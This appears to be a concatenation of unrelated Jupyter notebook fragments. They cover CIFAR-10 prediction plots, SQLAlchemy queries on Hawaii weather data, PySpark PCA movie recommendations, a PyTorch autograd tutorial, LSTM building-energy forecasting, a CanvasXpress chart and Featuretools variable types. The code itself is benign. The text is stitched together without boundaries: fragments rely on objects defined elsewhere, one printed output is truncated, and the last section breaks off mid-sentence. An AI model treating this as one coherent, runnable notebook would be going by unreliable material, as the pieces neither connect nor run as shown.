Visualize Some PredictionsThis may give you some insight into why the network is misclassifying certain objects.# get predictions on the test set y_hat = model.predict(x_test) # define text labels (source: https://www.cs.toronto.edu/~kriz/cifar.html) cifar10_labels = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck'] # plot a random sample of test images, their predicted labels, and ground truth fig = plt.figure(figsize=(20, 8)) for i, idx in enumerate(np.random.choice(x_test.shape[0], size=32, replace=False)): ax = fig.add_subplot(4, 8, i + 1, xticks=[], yticks=[]) ax.imshow(np.squeeze(x_test[idx])) pred_idx = np.argmax(y_hat[idx]) true_idx = np.argmax(y_test[idx]) ax.set_title("{} ({})".format(cifar10_labels[pred_idx], cifar10_labels[true_idx]), color=("green" if pred_idx == true_idx else "red"))Reflect Tables into SQLAlchemy ORM# Python SQL toolkit and Object Relational Mapper import sqlalchemy from sqlalchemy.ext.automap import automap_base from sqlalchemy.orm import Session from sqlalchemy import create_engine, func # create engine to hawaii.sqlite engine = create_engine("sqlite:///Resources/hawaii.sqlite") # reflect an existing database into a new model Base = automap_base() # reflect the tables Base.prepare(engine, reflect=True) # View all of the classes that automap found Base.classes.keys() # Save references to each table Measurement = Base.classes.measurement Station = Base.classes.station # Create our session (link) from Python to the DB session = Session(engine)Exploratory Precipitation Analysis# Find the most recent date in the data set. session.query(Measurement.date).order_by(Measurement.date.desc()).first() # Design a query to retrieve the last 12 months of precipitation data and plot the results. # Starting from the most recent data point in the database. # Calculate the date one year from the last date in data set. # Perform a query to retrieve the data and precipitation scores year_query = session.query(Measurement.date, Measurement.prcp).filter(Measurement.date >= '2016-08-23') # Save the query results as a Pandas DataFrame and set the index to the date column year_df = pd.read_sql(year_query.statement, engine) year_df.set_index('date', inplace = True) # Sort the dataframe by date year_df.sort_values(by = "date", inplace = True) year_df_dsum = year_df.groupby("date").sum() year_df_dsum = year_df_dsum["prcp"].round(2).to_frame() display(year_df_dsum) #Create vector of positions for x-axis labels x_even = list(np.linspace(0, 365, num = 12)) import datetime as dt dates = [] for i in range (8, 13): dates.append(str(dt.date(2016, i, 23))) for j in range(1, 9): dates.append(str(dt.date(2017, j, 23))) # Use Pandas Plotting with Matplotlib to plot the data year_df_dsum.plot(kind = "bar", figsize = (14, 4)) plt.xticks(ticks= x_even, labels = dates) plt.tight_layout() plt.show() #Code stops but still produces a graph # Use Pandas to calculate the summary statistics for the precipitation data year_df_dsum.describe()Exploratory Station Analysis# Design a query to calculate the total number stations in the dataset session.query(Station.station).count() # Design a query to find the most active stations (i.e. what stations have the most rows?) # List the stations and the counts in descending order. 
station_activity = session.query(Measurement.station, func.count(Measurement.station))\ .group_by(Measurement.station).order_by(func.count(Measurement.station).desc())\ .all() station_activity # Using the most active station id from the previous query, calculate the lowest, highest, and average temperature. station_id = station_activity[0][0] temp_min = session.query(func.min(Measurement.tobs)).filter(Measurement.station == station_id).first()[0] temp_max = session.query(func.max(Measurement.tobs)).filter(Measurement.station == station_id).first()[0] temp_avg = session.query(func.avg(Measurement.tobs)).filter(Measurement.station == station_id).first()[0] print(f"The minimum temperature at station {station_id} was {temp_min} degrees.") print(f"The maximum temperature at station {station_id} was {temp_max} degrees.") print(f"The average temperature at station {station_id} was {round(temp_avg, 1)} degrees.") # Using the most active station id # Query the last 12 months of temperature observation data for this station and plot the results as a histogram temps_last_year = session.query(Measurement.tobs).filter(Measurement.station == station_id)\ .filter(Measurement.date >= '2016-08-23').all() temp_list = [item for t in temps_last_year for item in t] plt.hist(temp_list, bins = 12, color = "purple") plt.xlabel("Temperature (F)") plt.ylabel("Frequency") plt.show()Close session# Close Session session.close()Content-based Recommendations with PCA Similar movies have similar tags. How well is this similarity captured with PCA?sc sc.install_pypi_package('pandas') sc.install_pypi_package('scikit-learn') df = sqlContext.read.csv('s3a://sparkdemonstration/movielens-tag-relevance.csv', header=True, inferSchema=True) import random colsToShow = ['title'] + [random.choice(df.columns) for i in range(4)] df.select(*colsToShow).show() from pyspark.ml.feature import VectorAssembler, StandardScaler newCols = [] for c in df.columns: if "." 
in c: new_column = c.replace('.', '_') df = df.withColumnRenamed(c, new_column) newCols.append(new_column) else: newCols.append(c) assembler = VectorAssembler(inputCols=[c for c in newCols if c != 'title'], outputCol='features') scaler = StandardScaler(inputCol='features', outputCol='normFeats', withMean=True) df = assembler.transform(df) scalerModel = scaler.fit(df) df = scalerModel.transform(df)PCArdd = df.select('normFeats').rdd from pyspark.mllib.linalg.distributed import RowMatrix from pyspark.mllib.linalg import Vectors vectors = rdd.map(Vectors.dense) matrix = RowMatrix(vectors)Get the PCspc = matrix.computePrincipalComponents(500) matrix_reduced = matrix.multiply(pc)Nearest Neighbour Search in PC spaceimport numpy as np X = matrix_reduced.rows.map(np.array).collect() X = np.array(X) titles = df.select('title').toPandas() import pandas as pd pdf = pd.DataFrame(X, index=titles['title']) pdf.head() from sklearn.neighbors import NearestNeighbors n_pcs = 2 nn = NearestNeighbors() nn = nn.fit(X[:, :n_pcs]) neighbors = nn.kneighbors(pdf.loc['Toy Story (1995)'].values[:n_pcs].reshape(1, -1), return_distance=False) pdf.index[neighbors.ravel()].tolist()Increase the number of Principal Componentsn_pcs = 10 nn = NearestNeighbors() nn = nn.fit(X[:, :n_pcs]) neighbors = nn.kneighbors(pdf.loc['Toy Story (1995)'].values[:n_pcs].reshape(1, -1), return_distance=False) pdf.index[neighbors.ravel()].tolist()n_pcs = 100 nn = NearestNeighbors() nn = nn.fit(X[:, :n_pcs]) neighbors = nn.kneighbors(pdf.loc['Toy Story (1995)'].values[:n_pcs].reshape(1, -1), return_distance=False) pdf.index[neighbors.ravel()].tolist() n_pcs = 500 nn = NearestNeighbors() nn = nn.fit(X[:, :n_pcs]) neighbors = nn.kneighbors(pdf.loc['Toy Story (1995)'].values[:n_pcs].reshape(1, -1), return_distance=False) pdf.index[neighbors.ravel()].tolist() n_pcs = 10 nn = NearestNeighbors() nn = nn.fit(X[:, :n_pcs]) neighbors = nn.kneighbors(pdf.loc['Conjuring, The (2013)'].values[:n_pcs].reshape(1, -1), return_distance=False) pdf.index[neighbors.ravel()].tolist()PyTorch TutorialIFT6135 – Representation LearningA Deep Learning Course, January 2018By (Adapted from Sandeep Subramanian's 2017 MILA tutorial) Torch Autograd, Variables, Define-by-run & Execution ParadigmAdapted from1. http://pytorch.org/tutorials/beginner/blitz/autograd_tutorial.htmlsphx-glr-beginner-blitz-autograd-tutorial-py 2. http://pytorch.org/docs/master/notes/autograd.html Variables : Thin wrappers around tensors to facilitate autogradSupports almost all operations that can be performed on regular tensorsimport numpy as np from __future__ import print_function import torch from torch.autograd import Variable![caption](images/Variable.png) Wrap tensors in a Variablez = Variable(torch.Tensor(5, 3).uniform_(-1, 1)) print(z)Variable containing: 0.3760 -0.5708 0.0276 -0.3886 -0.8144 -0.9552 -0.8893 0.3455 0.4211 0.5057 -0.9361 0.7122 -0.4049 -0.6500 0.0533 [torch.FloatTensor of size 5x3]Properties of Variables : Requiring gradients, Volatility, Data & Grad1. You can access the raw tensor through the .data attribute2. Gradient of the loss w.r.t. this variable is accumulated into .grad.3. 
Stay tuned for requires_grad and volatileprint('Requires Gradient : %s ' % (z.requires_grad)) print('Volatile : %s ' % (z.volatile)) print('Gradient : %s ' % (z.grad)) print(z.data) ### Operations on Variables x = Variable(torch.Tensor(5, 3).uniform_(-1, 1)) y = Variable(torch.Tensor(3, 5).uniform_(-1, 1)) # matrix multiplication z = torch.mm(x, y) print(z.size())torch.Size([5, 5])Define-by-run ParadigmThe torch autograd package provides automatic differentiation for all operations on Tensors.PyTorch's autograd is a reverse mode automatic differentiation system.Backprop is defined by how your code is run, and that every single iteration can be different.Other frameworks that adopt a similar approach :1. Chainer - https://github.com/chainer/chainer2. DyNet - https://github.com/clab/dynet3. Tensorflow Eager - https://research.googleblog.com/2017/10/eager-execution-imperative-define-by.html How autograd encodes execution historyConceptually, autograd maintains a graph that records all of the operations performed on variables as you execute your operations. This results in a directed acyclic graph whose leaves are the input variables and roots are the output variables. By tracing this graph from roots to leaves, you can automatically compute the gradients using the chain rule. ![caption](images/dynamic_graph.gif) GIF source: https://github.com/pytorch/pytorch Internally, autograd represents this graph as a graph of Function objects (really expressions), which can be `apply()` ed to compute the result of evaluating the graph. When computing the forwards pass, autograd simultaneously performs the requested computations and builds up a graph representing the function that computes the gradient (the `.grad_fn` attribute of each Variable is an entry point into this graph). When the forwards pass is completed, we evaluate this graph in the backwards pass to compute the gradients.x = Variable(torch.Tensor(5, 3).uniform_(-1, 1)) y = Variable(torch.Tensor(3, 5).uniform_(-1, 1)) z = torch.mm(x, y) print(z.grad_fn)NoneAn important thing to note is that the graph is recreated from scratch at every iteration, and this is exactly what allows for using arbitrary Python control flow statements, that can change the overall shape and size of the graph at every iteration. You don’t have to encode all possible paths before you launch the training - what you run is what you differentiate. 
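To make this concrete, here is a minimal sketch (reusing the `Variable` API from this tutorial; the function and values are only illustrative): ordinary Python control flow decides how many multiplications get recorded, so each call can build a different graph, and `backward()` differentiates exactly the path that was executed.
import random
import torch
from torch.autograd import Variable

def random_power(x):
    # Plain Python control flow: the recorded graph is whatever this run executes.
    degree = random.randint(1, 4)
    out = x
    for _ in range(degree):
        out = out * x
    return out

x = Variable(torch.Tensor([2.0]), requires_grad=True)
y = random_power(x)   # builds a graph computing x ** (degree + 1)
y.backward()          # differentiates the graph that was actually run
print(x.grad)         # (degree + 1) * x ** degree, so it varies from run to run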
Getting gradients : `backward()` & `torch.autograd.grad`x = Variable(torch.Tensor(5, 3).uniform_(-1, 1), requires_grad=True) y = Variable(torch.Tensor(5, 3).uniform_(-1, 1), requires_grad=True) z = x ** 2 + 3 * y z.backward(gradient=torch.ones(5, 3)) # eq computes element-wise equality torch.eq(x.grad, 2 * x) y.grad x = Variable(torch.Tensor(5, 3).uniform_(-1, 1), requires_grad=True) y = Variable(torch.Tensor(5, 3).uniform_(-1, 1), requires_grad=True) z = x ** 2 + 3 * y dz_dx = torch.autograd.grad(z, x, grad_outputs=torch.ones(5, 3)) dz_dy = torch.autograd.grad(z, y, grad_outputs=torch.ones(5, 3))Define-by-run example Common Variable definitionx = Variable(torch.Tensor(5, 3).uniform_(-1, 1), requires_grad=True) w = Variable(torch.Tensor(3, 10).uniform_(-1, 1), requires_grad=True) b = Variable(torch.Tensor(10,).uniform_(-1, 1), requires_grad=True)Graph 1 : `wx + b`o = torch.matmul(x, w) + b do_dinputs_1 = torch.autograd.grad(o, [x, w, b], grad_outputs=torch.ones(5, 10)) print('Gradients of o w.r.t inputs in Graph 1') print('do/dx : \n\n %s ' % (do_dinputs_1[0])) print('do/dw : \n\n %s ' % (do_dinputs_1[1])) print('do/db : \n\n %s ' % (do_dinputs_1[2]))Gradients of o w.r.t inputs in Graph 1 do/dx : Variable containing: -1.8514 3.5508 -0.7722 -1.8514 3.5508 -0.7722 -1.8514 3.5508 -0.7722 -1.8514 3.5508 -0.7722 -1.8514 3.5508 -0.7722 [torch.FloatTensor of size 5x3] Variable containing: -1.8514 3.5508 -0.7722 [torch.FloatTensor of size 3] do/dw : Variable containing: 2.4109 2.4109 2.4109 2.4109 2.4109 2.4109 2.4109 2.4109 2.4109 2.4109 0.9007 0.9007 0.9007 0.9007 0.9007 0.9007 0.9007 0.9007 0.9007 0.9007 -0.6632 -0.6632 -0.6632 -0.6632 -0.6632 -0.6632 -0.6632 -0.6632 -0.6632 -0.6632 [torch.FloatTensor of size 3x10] do/db : Variable containing: 5 5 5 5 5 5 5 5 5 5 [torch.FloatTensor of size 10]Graph 2 : wx / bo = torch.matmul(x, w) / b do_dinputs_2 = torch.autograd.grad(o, [x, w, b], grad_outputs=torch.ones(5, 10)) print('Gradients of o w.r.t inputs in Graph 2') print('do/dx : \n %s ' % (do_dinputs_2[0]), (w/b[None,:]).sum(1)) print('do/dw : \n %s ' % (do_dinputs_2[1]), (x.sum(0)[:,None]/b[None,:])) print('do/db : \n %s ' % (do_dinputs_2[2]))Gradients of o w.r.t inputs in Graph 2 do/dx : Variable containing: -1.9936 -0.3440 -1.9236 -1.9936 -0.3440 -1.9236 -1.9936 -0.3440 -1.9236 -1.9936 -0.3440 -1.9236 -1.9936 -0.3440 -1.9236 [torch.FloatTensor of size 5x3] Variable containing: -1.9936 -0.3440 -1.9236 [torch.FloatTensor of size 3] do/dw : Variable containing: Columns 0 to 7 -6.2344 -12.4075 2.4306 -4.7803 9.2018 -3.3722 -3.2028 3.7256 -2.3293 -4.6356 0.9081 -1.7860 3.4379 -1.2599 -1.1966 1.3919 1.7149 3.4129 -0.6686 1.3149 -2.5311 0.9276 0.8810 -1.0248 Columns 8 to 9 6.6273 5.8223 2.4761 2.1753 -1.8230 -1.6015 [torch.FloatTensor of size 3x10] Variable containing: Columns 0 to 7 -6.2344 -12.4075 2.4306 -4.7803 9.2018 -3.3722 -3.2028 3.7256 -2.3293 -4.6356 0.9081 -1.7860 3.4379 -1.2599 -1.1966 1.3919 1.7149 3.4129 -0.6686 1.3149 -2.5311 0.9276 0.8810 -1.0248 Columns 8 to 9 6.6273 5.8223 2.4761 2.1753 -1.8230 -1.6015 [torc[...]Gradient buffers: `.backward()` and `retain_graph=True`1. Calling `.backward()` clears the current computation graph.2. Once `.backward()` is called, intermediate variables used in the construction of the graph are removed.2. This is used implicitly to let PyTorch know when a new graph is to be built for a new minibatch. This is built around the forward and backward pass paradigm.3. To retain the graph after the backward pass use `loss.backward(retain_graph=True)`. 
This lets you re-use intermediate variables to potentially compute a secondary loss after the initial gradients are computed. This is useful to implement things like the gradient penalty in WGANs (https://arxiv.org/abs/1704.00028)o = torch.mm(x, w) + b o.backward(torch.ones(5, 10))Call backward again -> This failso = o ** 3 o.backward(torch.ones(5, 10))But with `retain_graph=True`o = torch.mm(x, w) + b o.backward(torch.ones(5, 10), retain_graph=True) o = o ** 3 o.backward(torch.ones(5, 10))WARNING: Calling `.backward()` multiple times will accumulate gradients into `.grad` and NOT overwrite them. Excluding subgraphs from backward: requires_grad=False, volatile=True & .detach `requires_grad=False`1. If there’s a single input to an operation that requires gradient, its output will also require gradient.2. Conversely, if all inputs don’t require gradient, the output won’t require it.3. Backward computation is never performed in the subgraphs, where all Variables didn’t require gradients.4. This is potentially useful when you have part of a network that is pretrained and not fine-tuned, for example word embeddings or a pretrained imagenet model.x = Variable(torch.Tensor(3, 5).uniform_(-1, 1), requires_grad=False) y = Variable(torch.Tensor(3, 5).uniform_(-1, 1), requires_grad=False) z = Variable(torch.Tensor(3, 5).uniform_(-1, 1), requires_grad=True) o = x + y print(' o = x + y requires grad ? : %s ' % (o.requires_grad)) o = x + y + z print(' o = x + y + z requires grad ? : %s ' % (o.requires_grad))o = x + y requires grad ? : False o = x + y + z requires grad ? : True`volatile=True`1. If a single input to an operation is volatile, the resulting variable will not have a `grad_fn` and so, the result will not be a node in the computation graph.2. Conversely, only if all inputs are not volatile, the output will have a `grad_fn` and be included in the computation graph.3. Volatile is useful when running Variables through your network during inference. Since it is fairly uncommon to go backwards through the network during inference, `.backward()` is rarely invoked. This means graphs are never cleared and hence it is common to run out of memory pretty quickly. Since operations on `volatile` variables are not recorded on the tape and therfore save memory.x = Variable(torch.Tensor(3, 5).uniform_(-1, 1), volatile=True) y = Variable(torch.Tensor(3, 5).uniform_(-1, 1), volatile=True) z = Variable(torch.Tensor(3, 5).uniform_(-1, 1), requires_grad=True) print('Graph : x + y') o = x + y print('o.requires_grad : %s ' % (o.requires_grad)) print('o.grad_fn : %s ' % (o.grad_fn)) print('\n\nGraph : x + y + z') o = x + y + z print('o.requires_grad : %s ' % (o.requires_grad)) print('o.grad_fn : %s ' % (o.grad_fn))Graph : x + y o.requires_grad : False o.grad_fn : None Graph : x + y + z o.requires_grad : False o.grad_fn : None`.detach()`1. It is possible to detach variables from the graph by calling `.detach()`. 2. This could lead to disconnected graphs. 
In which case PyTorch will only backpropagate gradients until the point of disconnection.x = Variable(torch.Tensor(3, 5).uniform_(-1, 1), requires_grad=True) y = Variable(torch.Tensor(3, 5).uniform_(-1, 1), requires_grad=True) z = Variable(torch.Tensor(3, 5).uniform_(-1, 1), requires_grad=True)![caption](images/detach.png)m1 = x + y m2 = z ** 2 m1 = m1.detach() m3 = m1 + m2 m3.backward(torch.ones(3, 5)) print('dm3/dx \n\n %s ' % (x.grad)) print('\ndm3/dy \n\n %s ' % (y.grad)) print('\ndm3/dz \n\n %s ' % (z.grad))dm3/dx None dm3/dy None dm3/dz Variable containing: 1.7403 -1.0072 -1.6154 0.8655 -1.6296 -0.6863 0.7827 1.4004 1.5234 -0.7945 -0.6001 -0.2892 1.0473 -0.7920 1.7398 [torch.FloatTensor of size 3x5]Gradients w.r.t intermediate variables in the graph1. By default, PyTorch all gradient computations w.r.t intermediate nodes in the graph are ad-hoc.2. This is in the interest of saving memory.3. To compute gradients w.r.t intermediate variables, use `.retain_grad()` or explicitly compute gradients using `torch.autograd.grad`4. `.retain_grad()` populates the `.grad` attribute of the Variable while `torch.autograd.grad` returns a Variable that contains the gradients.x = Variable(torch.Tensor(3, 5).uniform_(-1, 1), requires_grad=True) y = Variable(torch.Tensor(3, 5).uniform_(-1, 1), requires_grad=True) z = Variable(torch.Tensor(3, 5).uniform_(-1, 1), requires_grad=True) m1 = x + y m2 = z ** 2 #m1.retain_grad() #m2.retain_grad() m3 = m1 * m2 m3.backward(torch.ones(3, 5)) print('dm3/dm1 \n\n %s ' % (m1.grad)) print('dm3/dm2 \n\n %s ' % (m2.grad))dm3/dm1 None dm3/dm2 NoneIn place operations on variables in a graphsource: http://pytorch.org/docs/master/notes/autograd.htmlIn place operations are suffixed by `_` ex: `log_`, `uniform_` etc.1. Supporting in-place operations in autograd is difficult and PyTorch discourages their use in most cases.2. Autograd’s aggressive buffer freeing and reuse makes it very efficient and there are very few occasions when in-place operations actually lower memory usage by any significant amount. Unless you’re operating under heavy memory pressure, you might never need to use them. There are two main reasons that limit the applicability of in-place operations:(a) Overwriting values required to compute gradients. This is why variables don’t support `log_`. Its gradient formula requires the original input, and while it is possible to recreate it by computing the inverse operation, it is numerically unstable, and requires additional work that often defeats the purpose of using these functions.(b) Every in-place operation actually requires the implementation to rewrite the computational graph. Out-of-place versions simply allocate new objects and keep references to the old graph, while in-place operations, require changing the creator of all inputs to the Function representing this operation. This can be tricky, especially if there are many Variables that reference the same storage (e.g. created by indexing or transposing), and in-place functions will actually raise an error if the storage of modified inputs is referenced by any other Variable.In-place correctness checks Second and higher order derivatives Computing gradients w.r.t gradients1. `o = xy + z`2. 
`l = o + do_dz` Practical application of this in WGAN-GP later in the tutorialx = Variable(torch.Tensor(5, 3).uniform_(-1, 1), requires_grad=True) y = Variable(torch.Tensor(3, 5).uniform_(-1, 1), requires_grad=True) z = Variable(torch.Tensor(5, 5).uniform_(-1, 1), requires_grad=True) o = torch.mm(x, y) + z ** 2 # if create_graph=False then the resulting gradient is volatile and cannot be used further to compute a second loss. do_dz = torch.autograd.grad(o, z, grad_outputs=torch.ones(5, 5), retain_graph=True, create_graph=True) print('do/dz \n\n : %s ' % (do_dz[0])) l = o ** 3 + do_dz[0] dl_dz = torch.autograd.grad(l, z, grad_outputs=torch.ones(5, 5)) print('dl/dz \n\n : %s ' % (dl_dz[0]))do/dz : Variable containing: 0.8046 -1.3414 -0.8913 0.8948 0.8958 0.8805 0.2785 -0.6247 0.2613 1.7083 -0.3923 -1.3852 0.8209 0.0717 -1.4100 -1.4595 -1.1630 -0.9028 0.5350 -1.0883 -0.5544 -1.4089 -1.8867 0.7881 0.4331 [torch.FloatTensor of size 5x5] dl/dz : Variable containing: 4.4851 1.5581 0.9685 2.8737 2.2610 3.7015 2.0926 1.4587 2.3183 6.6514 0.7937 1.6650 3.1470 2.0015 1.5008 0.8378 1.2132 1.7051 2.1034 1.5498 1.9095 1.9999 -10.4797 3.2264 2.6647 [torch.FloatTensor of size 5x5]FunctionsMAX_EPOCHS = 25 def compile_and_fit(model, window, patience=2): early_stopping = tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=patience, mode='min') model.compile(loss=tf.losses.MeanSquaredError(), optimizer=tf.optimizers.Adam(), metrics=[tf.metrics.MeanAbsoluteError()]) history = model.fit(window.train, epochs=MAX_EPOCHS, validation_data=window.val, callbacks=[early_stopping]) return historyData readingpath = "./drive/MyDrive/ICT4building/" figure_path = "./drive/MyDrive/ICT4building/prediction_figure/" data_raw = pd.read_csv(path+"Data4prediction2.csv")[0:8760] data_raw.columns plt.figure() plt.plot(data_raw["Mean Operative Temperature"]) plt.figure() plt.plot(data_raw["DistrictCooling:Facility [J](Hourly)"]) df_winter=pd.concat([data_raw[len(data_raw)-744:-1], data_raw[0:1416]], ignore_index=True, sort=False) df_spring=data_raw[1417:3625] df_summer=data_raw[3636:5809] df_autumn=data_raw[5809:len(data_raw)-745] print(len(df_winter),len(df_spring),len(df_summer),len(df_autumn))2159 2208 2173 2206Data pre-processingsave_fig = False predict_steps = 12 # Future Hours train_num=24*7 test_num=train_num season = "autumn" labels = ['Mean Operative Temperature'] # labels = ['Electricity:Facility [J](Hourly)'] # labels = ['DistrictCooling:Facility [J](Hourly)'] # labels = ['DistrictHeating:Facility [J](Hourly)'] if season == "winter": data_set=df_winter.copy() elif season == "spring": data_set=df_spring.copy() elif season == "summer": data_set=df_summer.copy() elif season == "autumn": data_set=df_autumn.copy() else: raise ValueError features = ['Date/Time',\ 'Environment:Site Outdoor Air Drybulb Temperature [C](Hourly)',\ 'Environment:Site Wind Speed [m/s](Hourly)',\ 'Environment:Site Diffuse Solar Radiation Rate per Area [W/m2](Hourly)',\ 'Environment:Site Direct Solar Radiation Rate per Area [W/m2](Hourly)',\ 'Environment:Site Outdoor Air Barometric Pressure [Pa](Hourly)',\ 'Environment:Site Solar Azimuth Angle [deg](Hourly)',\ 'Environment:Site Solar Altitude Angle [deg](Hourly)' ] data_set=data_set[features+labels] data_set.describe().transpose() ## convert datetime to sin day = data_set['Date/Time'] data_set['Date/Time'] = np.sin(day*2*np.pi/(24*7)) column_indices = {name: i for i, name in enumerate(data_set.columns)} n = len(data_set) train_df = data_set[0:int(n*0.7)] val_df = 
data_set[int(n*0.7):int(n*0.9)] test_df = data_set[int(n*0.9):] num_features = data_set.shape[1] train_mean = train_df.mean() train_std = train_df.std() train_df = (train_df - train_mean) / train_std val_df = (val_df - train_mean) / train_std test_df = (test_df - train_mean) / train_std df_std = (data_set - train_mean) / train_std df_std = df_std.melt(var_name='Column', value_name='Normalized') plt.figure(figsize=(12, 6)) ax = sns.violinplot(x='Column', y='Normalized', data=df_std) _ = ax.set_xticklabels(data_set.keys(), rotation=90) wide_window = WindowGenerator( input_width=train_num, label_width=test_num, shift=predict_steps,\ train_df=train_df,val_df=val_df,test_df=test_df,\ label_columns=labels) lstm_model = tf.keras.models.Sequential([ # Shape [batch, time, features] => [batch, time, lstm_units] tf.keras.layers.LSTM(32, return_sequences=True), # Shape => [batch, time, features] tf.keras.layers.Dense(units=1) ]) multi_lstm_model = tf.keras.Sequential([ # Shape [batch, time, features] => [batch, lstm_units]. # Adding more `lstm_units` just overfits more quickly. tf.keras.layers.LSTM(32, return_sequences=False), # Shape => [batch, out_steps*features]. tf.keras.layers.Dense(train_num*num_features, kernel_initializer=tf.initializers.zeros()), # Shape => [batch, out_steps, features]. tf.keras.layers.Reshape([train_num, num_features]) ]) if predict_steps == 1: model = lstm_model elif predict_steps > 1: model =multi_lstm_model else: raise ValueError print('Input shape:', wide_window.example[0].shape) print('Output shape:', model(wide_window.example[0]).shape) print(wide_window.input_indices) history = compile_and_fit(model, wide_window) IPython.display.clear_output() val_performance = {} performance = {} IPython.display.clear_output() val_performance['LSTM'] = model.evaluate(wide_window.val) performance['LSTM'] = model.evaluate(wide_window.test, verbose=0) print(model.metrics_names.index('mean_absolute_error')) print(val_performance['LSTM']) wide_window.plot(model = model,plot_col=labels[0],max_subplots=5) x = np.arange(len(performance)) width = 0.3 metric_name = 'mean_absolute_error' metric_index = model.metrics_names.index('mean_absolute_error') val_mae = [v[metric_index] for v in val_performance.values()] test_mae = [v[metric_index] for v in performance.values()] plt.ylabel('mean_absolute_error [avgtem, normalized]') plt.bar(x - 0.17, val_mae, width, label='Validation') plt.bar(x + 0.17, test_mae, width, label='Test') plt.xticks(ticks=x, labels=performance.keys(), rotation=45) _ = plt.legend() print(performance) inputs_tmp, labels_tmp = wide_window.example_test predictions = model(inputs_tmp) obversion = labels_tmp[3,:,0]*train_std[labels[0]]+train_mean[labels[0]] test_result = predictions[3,:,0]*train_std[labels[0]]+train_mean[labels[0]] if labels[0]!="Mean Operative Temperature": obversion=obversion/3.6e6 test_result=test_result/3.61e6 plt.figure() plt.plot(obversion,label="obversion") plt.plot(test_result,label="prediction") plt.xlabel("time [h]") plt.ylabel("avg op temperature [deg]") plt.legend() if labels[0]=="Mean Operative Temperature" and save_fig==True: plt.savefig(figure_path+'RNN_temperature_'+season+'.png') avg_mse = 0 for i in range(len(labels_tmp)): obversion = labels_tmp[i,:,0]*train_std[labels[0]]+train_mean[labels[0]] test_result = predictions[i,:,0]*train_std[labels[0]]+train_mean[labels[0]] if labels[0]!="Mean Operative Temperature": obversion=obversion/3.6e6 test_result=test_result/3.61e6 avg_mse += (mse(obversion,test_result)) 
print(avg_mse/len(labels_tmp))0.703045747242868Example: CanvasXpress layout Chart No. 18This example page demonstrates how to, using the Python package, create a chart that matches the CanvasXpress online example located at:https://www.canvasxpress.org/examples/layout-18.htmlThis example is generated using the reproducible JSON obtained from the above page and the `canvasxpress.util.generator.generate_canvasxpress_code_from_json_file()` function.Everything required for the chart to render is included in the code below. Simply run the code block.from canvasxpress.canvas import CanvasXpress from canvasxpress.js.collection import CXEvents from canvasxpress.render.jupyter import CXNoteBook cx = CanvasXpress( render_to="layout18", data={ "y": { "vars": [ "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "12", "13", "14", "15", "16", "17", "18", "19", "20", "21", "22", "23", "24", "25", "26", "27", "28", "29", "30", "31", "32", "33", "34", "35", "36", "37", "38", "39", "40", "41", "42", "43" ], "smps": [ "x", "y" ], "data": [ [ 10, 8.04 ], [ 8, 6.95 ], [ 13, 7.58 ], [ 9, 8.81 ], [ 11, 8.33 ], [ 14, 9.96 ], [ 6, 7.24 ], [ 4, 4.26 ], [ 12, 10.84 ], [ 7, 4.82 ], [ 5, 5.68 ], [ 10, 9.14 ], [ 8, 8.14 ], [ 13, 8.74 ], [ 9, 8.77 ], [ 11, 9.26 ], [ 14, 8.1 ], [ 6, 6.13 ], [ 4, 3.1 ], [ 12, 9.13 ], [ 7, 7.26 ], [ 5, 4.74 ], [ 10, 7.46 ], [ 8, 6.77 ], [ 13, 12.74 ], [ 9, 7.11 ], [ 11, 7.81 ], [ 14, 8.84 ], [ 6, 6.08 ], [ 4, 5.39 ], [ 12, 8.15 ], [ 7, 6.42 ], [ 5, 5.73 ], [ 8, 6.58 ], [ 8, 5.76 ], [ 8, 7.71 ], [ 8, 8.84 ], [ 8, 8.47 ], [ 8, 7.04 ], [ 8, 5.25 ], [ 19, 12.5 ], [ 8, 5.56 ], [ 8, 7.91 ], [ 8, 6.89 ] ] }, "z": { "dataset": [ "I", "I", "I", "I", "I", "I", "I", "I", "I", "I", "I", "II", "II", "II", "II", "II", "II", "II", "II", "II", "II", "II", "III", "III", "III", "III", "III", "III", "III", "III", "III", "III", "III", "IV", "IV", "IV", "IV", "IV", "IV", "IV", "IV", "IV", "IV", "IV" ] } }, config={ "graphType": "Scatter2D", "segregateVariablesBy": [ "dataset" ] }, width=613, height=613, events=CXEvents(), after_render=[ [ "addRegressionLine", [ "dataset", None, None ] ] ], other_init_params={ "version": 35, "events": False, "info": False, "afterRenderInit": False, "noValidate": True } ) display = CXNoteBook(cx) display.render(output_file="layout_18.html")Variable TypesA Variable is analogous to a column in a table in a relational database. When creating an Entity, Featuretools will attempt to infer the types of variables present. Featuretools also allows for explicitly specifying the variable types when creating the Entity.**It is important that datasets have appropriately defined variable types when using DFS because this will allow the correct primitives to be used to generate new features.**> Note: When using Dask Entities, users must explicitly specify the variable types for all columns in the Entity dataframe. To understand the different variable types in Featuretools, let's first look at a graph of the variables:from featuretools.variable_types import graph_variable_types graph_variable_types()As we can see, there are multiple variable types and some have subclassed variable types. For example, ZIPCode is variable type that is child of Categorical type which is a child of Discrete type. Let's explore some of the variable types and understand them in detail. DiscreteA Discrete variable type can only take certain values. It is a type of data that can be counted, but cannot be measured. If it can be classified into distinct buckets, then it a discrete variable type. 
There are 2 sub-variable types of Discrete. These are Categorical and Ordinal. If the data has a certain ordering, it is of Ordinal type. If it cannot be ordered, then it is a Categorical type. Categorical A Categorical variable type can take unordered discrete values. It usually has a limited, fixed number of possible values. Categorical variable types can be represented as strings or integers. Some examples of Categorical variable types:- Gender- Eye Color- Nationality- Hair Color- Spoken Language OrdinalAn Ordinal variable type can take ordered discrete values. Similar to Categorical, it usually has a limited, fixed number of possible values. However, these discrete values have a certain order, and the ordering is important to understanding the values. Ordinal variable types can be represented as strings or integers. Some examples of Ordinal variable types:- Educational Background (Elementary, High School, Undergraduate, Graduate)- Satisfaction Rating (“Not Satisfied”, “Satisfied", “Very Satisfied”)- Spicy Level (Hot, Hotter, Hottest)- Student Grade (A, B, C, D, F)- Size (small, medium, large) Categorical SubTypes (CountryCode, Id, SubRegionCode, ZIPCode)There are also more distinctions within the Categorical variable type. These include CountryCode, Id, SubRegionCode, and ZIPCode.It is important to make this distinction because there are certain operations that can be applied, but they don't necessarily apply to all Categorical types. For example, there could be a [custom primitive](https://docs.featuretools.com/en/stable/automated_feature_engineering/primitives.html#defining-custom-primitives) that applies to the ZIPCode variable type. It could extract the first 5 digits of a ZIPCode. However, this operation is not valid for all Categorical variable types. Therefore it is 